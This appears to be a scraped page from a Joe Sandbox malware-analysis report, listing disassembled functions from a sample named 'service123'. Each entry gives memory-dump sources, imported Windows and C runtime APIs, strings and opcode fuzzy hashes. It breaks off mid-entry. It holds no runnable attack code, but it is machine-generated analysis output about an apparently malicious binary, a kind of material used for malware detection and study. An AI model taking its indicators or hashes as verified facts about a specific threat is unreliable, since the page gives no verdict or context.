Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: ce206bca882dad8beee8e83a631d345ceec6b1a2210d291adf99eeed9af7f9df
Instruction ID: 3044800fe16735be97c8789fce19a201d4796eff8ab949c7301a164dc6d10d6a
Opcode Fuzzy Hash: ce206bca882dad8beee8e83a631d345ceec6b1a2210d291adf99eeed9af7f9df
Instruction Fuzzy Hash: 2961E3B0904318CFCB04DFA8C59469EBBF1BF88314F14892EE8989B755E7749889CF91

Function 6C9CF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9CF85F
ReleaseSemaphore.KERNEL32 ref: 6C9CF8E3

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: f9fd1e3794b9fc66ff77a0b748bf0dee5439674a00ccb573420ab818948c4cf4
Instruction ID: d7e4883d91336233a435dc1fc06efc542f323041013691a20a1d798a2f8c0ff1
Opcode Fuzzy Hash: f9fd1e3794b9fc66ff77a0b748bf0dee5439674a00ccb573420ab818948c4cf4
Instruction Fuzzy Hash: 7A313770B093028FDB48EF29C5887067BF4BB4A328F15C65DD8598B291D734D546DB93

Function 6C9CFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9CFCEC
ReleaseSemaphore.KERNEL32 ref: 6C9CFD7C
CreateSemaphoreW.KERNEL32 ref: 6C9CFDC7
WaitForSingleObject.KERNEL32 ref: 6C9CFE10

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: ad2310ff86e6586e7173fca0452e49ff942c6ad4a90f003eda5d41f3a5cdac0c
Instruction ID: 290d3de728d70eb1c9119bc3203ba1720f2ed3c3cbaec5faa81c800c50406aa7
Opcode Fuzzy Hash: ad2310ff86e6586e7173fca0452e49ff942c6ad4a90f003eda5d41f3a5cdac0c
Instruction Fuzzy Hash: 97311770B093028FDB48EF29C6887467BF5BB0A328F11C25CD9598B686D735D44ADB93

Function 6CA88520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA88535
strlen.MSVCRT ref: 6CA88583
memcpy.MSVCRT ref: 6CA885A0
setlocale.MSVCRT ref: 6CA885B4
setlocale.MSVCRT ref: 6CA885EA

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: ceaae49589750b7f0f75a525bbd18b7e29c4a3391d4984c231071bb93c6e0f27
Instruction ID: 0f2b904d03b11f133cbb0babe828c99b3779c7a78a32f7686db2380b68484f2d
Opcode Fuzzy Hash: ceaae49589750b7f0f75a525bbd18b7e29c4a3391d4984c231071bb93c6e0f27
Instruction Fuzzy Hash: 372102B56097109FD340EF28D48065EFBE0EF98258F46896EE5C8DB701E734D9848F82

Function 6C9D9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C9D9549
_unlock.MSVCRT ref: 6C9D9571
calloc.MSVCRT ref: 6C9D95BF

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 0b880ca790ad242b251ebded6e79aeed58aa9d22aed852ab3d476dede62f7005
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 201156715146108FDB40AF28C590786BBE4AF95244F17CAB9C898DF749EF30E844CBA2

Function 6C9D0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9D02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9D04DE), ref: 6C9D02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9D04DE), ref: 6C9D0300

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 3313d46c479b864c7cafcc42b8721ae2126ba437380a326188a76a0b41fd926a
Instruction ID: 50cf4348bfd6ffe90f1caac326c2392ac0d7db15d42d9f8e3f626f9104be0834
Opcode Fuzzy Hash: 3313d46c479b864c7cafcc42b8721ae2126ba437380a326188a76a0b41fd926a
Instruction Fuzzy Hash: 3BF030B0509B428BDB847F78C51935E7AB0BF56328F42CA5CE0A997A91E738D005DB93

Function 001C4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 001C4C27
@, xrefs: 001C4647

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: d02abd32855c0dfc7e9db6dba7aa4169e8a1400908d864a803f4a0c0fb02fbc5
Instruction ID: e7376792deb423c2c445189015cddeae47ae621113a01914ebf82e7fa82ec905
Opcode Fuzzy Hash: d02abd32855c0dfc7e9db6dba7aa4169e8a1400908d864a803f4a0c0fb02fbc5
Instruction Fuzzy Hash: 11A1B13160C3918BD731DF24C0A0BAABBE1BFA5714F158A1DE8D997382D735D906DB82

Function 6C9D52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C9D4D17
(null), xrefs: 6C9D52F7

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: ddecefebbeb02eed6690abb87cb754ab08241f82c79b4e923de5c2b655e25755
Instruction ID: d0e7ab649abc9dd800482abb195f62b2b271fb17de7d2a35b8017317e29b6148
Opcode Fuzzy Hash: ddecefebbeb02eed6690abb87cb754ab08241f82c79b4e923de5c2b655e25755
Instruction Fuzzy Hash: 06A1AF7160CB968BD7218F24D09039AB7E5BF85308F16CA1DE8DCA7741D735E90ACB82

Function 001C1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

Unknown pseudo relocation protocol version %d., xrefs: 001C1DF3
Unknown pseudo relocation bit size %d., xrefs: 001C1C6D
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 001C1C20

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: d2be5a8465718db94f70f2a7aea1c7911074f61245cf89ebf18b2613cf6b9249
Instruction ID: 46866bd2dbef8799d2dcdb980af8e9e6332e243d726f7dc9e856389e735a7f2e
Opcode Fuzzy Hash: d2be5a8465718db94f70f2a7aea1c7911074f61245cf89ebf18b2613cf6b9249
Instruction Fuzzy Hash: 2D81A071A40605DBCB10DF68D880FA9B7F1FFA6344F5A852DE895A7216D330EC548B92

Function 6C9CA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C9CA970
Unknown pseudo relocation bit size %d., xrefs: 6C9CA9BD
Unknown pseudo relocation protocol version %d., xrefs: 6C9CAB43

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 78a6ba98a0e20e9c4cd4b86360a6bb29062c6c2c4973ed25f1aba4f60d0e5b9d
Instruction ID: 7c00af30533ba92cb088af7ef5e99b8c6e15ff79b255a9856ece603e8118b5c1
Opcode Fuzzy Hash: 78a6ba98a0e20e9c4cd4b86360a6bb29062c6c2c4973ed25f1aba4f60d0e5b9d
Instruction Fuzzy Hash: FF718D72B0020ACFCB10CF69D98179EB7B5BB45308F16862AD854ABB01D730E856CB93

Function 001C80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 001C80F2
strchr.MSVCRT ref: 001C8102
atoi.MSVCRT ref: 001C8113

Strings

., xrefs: 001C80F7

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 08dea263bd1a0e8795cf97c7761310d0752967cead3e5a755e89f89cd9e5799e
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 78E0ECB19047018ED7407F78C98A71ABAE1ABA0300F4D8C6CE48887245EB79D8469752

Function 6C9D9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9D9142
strchr.MSVCRT ref: 6C9D9152
atoi.MSVCRT ref: 6C9D9163

Strings

., xrefs: 6C9D9147

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 14ea86e5f83c70448cbb69dad6225954627a2867e666e07238d9e254eaaed454
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: 9CE0E671904B115AD7007F3CC41935A76D57B61308F87C85CD484AB744DB79E5499752

Function 6C9D9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C9D929F
GetProcAddress.KERNEL32 ref: 6C9D92B3

Strings

advapi32.dll, xrefs: 6C9D9298
SystemFunction036, xrefs: 6C9D92A8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 86fc5b46db700aa98e96f220983a0b98e41e2679f966b05f4c814e26931f631f
Instruction ID: 2ac26337c74abcede82af859af2e8702a68c08a4cc0051871d66a8ec172e0b5e
Opcode Fuzzy Hash: 86fc5b46db700aa98e96f220983a0b98e41e2679f966b05f4c814e26931f631f
Instruction Fuzzy Hash: 21E0E6B1D55741CFCB00BFBC950604ABBF0B606324F02996EE486A7601DB34D556DB9B

Function 6C9D1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C9D14D2

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 179fc6dd0aef545babcf865c07cc3192e1ae2701c53367b74dc8c89c66a18c52
Instruction ID: ed8c6464fa8acefb4eb3c89cf839de8fe74ec35e39aab9493a1ae31858a7d672
Opcode Fuzzy Hash: 179fc6dd0aef545babcf865c07cc3192e1ae2701c53367b74dc8c89c66a18c52
Instruction Fuzzy Hash: 19220275A08B418FC724CF69C48475AFBE1BF99358F12892EE9D9A7710D734E844CB82

Function 6C9CA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9CA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C9DC41C), ref: 6C9CA3E0
free.MSVCRT ref: 6C9CA3EA

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 5836b7880853235d2cf19e77f654c9b4ed4d52f843cb8b5bac69124704c88f7b
Instruction ID: 640ad53bd0d8bd214b4225b6baa8bdb23e7025433ab7314e71ccb192426d8433
Opcode Fuzzy Hash: 5836b7880853235d2cf19e77f654c9b4ed4d52f843cb8b5bac69124704c88f7b
Instruction Fuzzy Hash: 55318472709B118BD300AF6AD49431FBBE9EFD1758F224A2CD9A44BB40DB35D8458793

Function 6CA15C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA15D74
memchr.MSVCRT ref: 6CA15D93

Part of subcall function 6CA88520: setlocale.MSVCRT ref: 6CA88535

Strings

., xrefs: 6CA15D85
-, xrefs: 6CA15F72

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 5881e1df9c1d3f42729c01ba211567959ab3c91830eeecd518929a41becd0ed4
Instruction ID: 235d02d6566e7529d5fb857dc5a3ff5d04a0a6f5d24d7a01bacee57da1dd6df0
Opcode Fuzzy Hash: 5881e1df9c1d3f42729c01ba211567959ab3c91830eeecd518929a41becd0ed4
Instruction Fuzzy Hash: BDD139B5D083198FCB00DFA8C48458EBBF1BF48344F15866AE8A4EB751D734D989CB82

Function 6CA16080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA161AE
memchr.MSVCRT ref: 6CA161CD

Part of subcall function 6CA88520: setlocale.MSVCRT ref: 6CA88535

Strings

., xrefs: 6CA161BF
6, xrefs: 6CA163B6

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 4a22a77c0ffd1eb8e2ba6ad95f1bad275dce75faab730aae5ecea1abca91f976
Instruction ID: e67a436a85c434a8056d4f4ac9cf7c5b284042893fd9b6842d76788091dfe2df
Opcode Fuzzy Hash: 4a22a77c0ffd1eb8e2ba6ad95f1bad275dce75faab730aae5ecea1abca91f976
Instruction Fuzzy Hash: 02D147B19093598FCB00DFA8C58068EBBF1FF48314F158A6AE8A4E7751D734D989CB81

Function 6CA90F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA90FD5

Strings

basic_string::append, xrefs: 6CA9104D, 6CA91059, 6CA9114C, 6CA9120C

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: b426f1b2fe6a4a5bc9ba551f07db5593d13b74ffbcd07c9fa4bf8046d1ecc0f0
Instruction ID: 0c41b447e9cae79df485a8d84856bf0879688154de61715e7b24a53c9f430bc7
Opcode Fuzzy Hash: b426f1b2fe6a4a5bc9ba551f07db5593d13b74ffbcd07c9fa4bf8046d1ecc0f0
Instruction Fuzzy Hash: 27A17D71A042049FCB00EF69C5C56AEBBF4FF89314F04856DE8988B744E734E889CB92

Function 6CA2B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6CA2997F), ref: 6CA2B336
